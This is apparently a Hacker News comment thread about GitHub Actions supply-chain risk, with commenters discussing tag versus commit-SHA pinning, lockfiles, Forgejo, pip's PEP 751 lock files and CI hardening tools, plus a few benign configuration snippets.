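      - uses: actions/checkout@v4
      - name: Run the real CI logic
        run: ./ci/build.sh   # the same script runs locally or on any other CI
```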
Comment by carschno 1 day ago
For those who can still escape the lock-in, this is probably a good occasion to point to Forgejo, an open-source alternative that also has CI actions: https://forgejo.org/2023-02-27-forgejo-actions/ It is used by Codeberg: https://codeberg.org/
Comment by mfenniak 1 day ago
However, as noted in the article, Forgejo's implementation currently has all the same "package manager" problems.
Comment by carschno 1 day ago
Comment by esafak 1 day ago
Comment by zufallsheld 12 hours ago
Comment by timwis 1 day ago
Comment by eYrKEC2 1 day ago
Comment by cyberax 1 day ago
This works well for _most_ things. There are some issues with doing docker-in-docker for volume mapping, but they're mostly trivial. We're using taskfiles to run tasks, so I can just rely on it for that. It also has built-in support for nice output grouping ( https://taskfile.dev/docs/reference/schema#output ) that GitHub Actions can parse.
Pros:
1. Ability to run things in parallel.
2. Ability to run things _locally_ in a completely identical environment.
3. It's actually faster!
4. No vendor lock-in. Offramp to github runners and eventually local runners?
Cons:
It often takes quite a while to understand how actions work when you want to run them in your own environment. For example, how do you get credentials to access the GitHub Actions cache and then pass them to Docker? Most of the documentation just says: "Use this GitHub Action and stop worrying your pretty little head about it".
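For the Docker cache case specifically, newer Buildx versions can talk to the Actions cache service directly via the `gha` cache backend, which avoids plumbing the credentials by hand inside a workflow; a sketch using Docker's official actions:

```yaml
steps:
  - uses: docker/setup-buildx-action@v3
  - uses: docker/build-push-action@v6
    with:
      push: false
      cache-from: type=gha         # read layer cache from the Actions cache service
      cache-to: type=gha,mode=max  # write all layers back
```

Outside those wrapper actions you do end up exporting the runtime token yourself, which is exactly the under-documented part being complained about here.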
Comment by IshKebab 1 day ago
Well... not Pip!
Comment by notatallshaw 17 hours ago
Pip has been a flag bearer for Python packaging standards for some time now, so that alternatives can implement standards rather than copy behavior. So first a lock file standard had to be agreed upon, which finally happened this year: https://peps.python.org/pep-0751/
Now it's a matter of the maintainers, who are currently all volunteers donating their spare time, fully implementing support. Progress is happening, but it is a little slow because of this.
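Until that lands, the closest pip-native approximation is hash-checking mode, where every pinned requirement carries its expected digests and pip refuses anything unverified; a sketch (the digest is a placeholder, not a real hash):

```text
# requirements.txt -- install with: pip install --require-hashes -r requirements.txt
requests==2.32.3 \
    --hash=sha256:<64-hex-digest-of-the-wheel>
```

Files in this form can be generated with tools like pip-compile's `--generate-hashes`.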
Comment by thangngoc89 1 day ago
Comment by curcbit 1 day ago
Comment by LoganDark 1 day ago
Comment by regularfry 1 day ago
Comment by LoganDark 1 day ago
Comment by sharts 1 day ago
Like, what did one expect?
Comment by ignoramous 1 day ago
Harsh, given GitHub makes it very easy to set up attestations for artifact provenance (like build & SBOM provenance).
That said, Zizmor (static analyser for GitHub Actions) with Step Security's Harden Runner (a runtime analyser) [0] pair nicely, even if the latter is a bit of an involved setup.
[0] https://github.com/step-security/harden-runner
> The fix is a lockfile.
Hopefully, SLSA's draft makes a hermetic build process a requirement: https://slsa.dev/spec/v1.2/future-directions
Comment by woodruffw 1 day ago
Comment by throwawaypath 16 hours ago
Comment by TrianguloY 1 day ago
If I write actions/setup-python@v1, I'm expecting the action to run with the v1 tag of that repository. If I rerun it, I expect it to run with the v1 tag of that repository...which I'm aware may not be the same if the tag was updated.
If I instead use actions/setup-python@27b31702a0e7fc50959f5ad993c78deac1bdfc29 then I'm expecting the action to run with that specific commit. And if I run it again it will run with the same commit.
So, whether you choose the tag or the commit depends on whether you trust the repository or not, and if you want automatic updates. The option is there...isn't it?
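The two styles from this comment, side by side in workflow syntax:

```yaml
steps:
  # mutable: re-resolves whatever the tag points to on every run
  - uses: actions/setup-python@v1
  # immutable: always this exact commit, even if tags move
  - uses: actions/setup-python@27b31702a0e7fc50959f5ad993c78deac1bdfc29
```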
Comment by barrkel 1 day ago
Comment by TrianguloY 1 day ago
Comment by eviks 1 day ago
That expectation is the mistake that breaks everything that follows. People don't usually expect a tag to be an arbitrary, modifiable reference; they expect it to be the same version they picked when they created the file (i.e. that a tag is just a human-friendly name for a commit).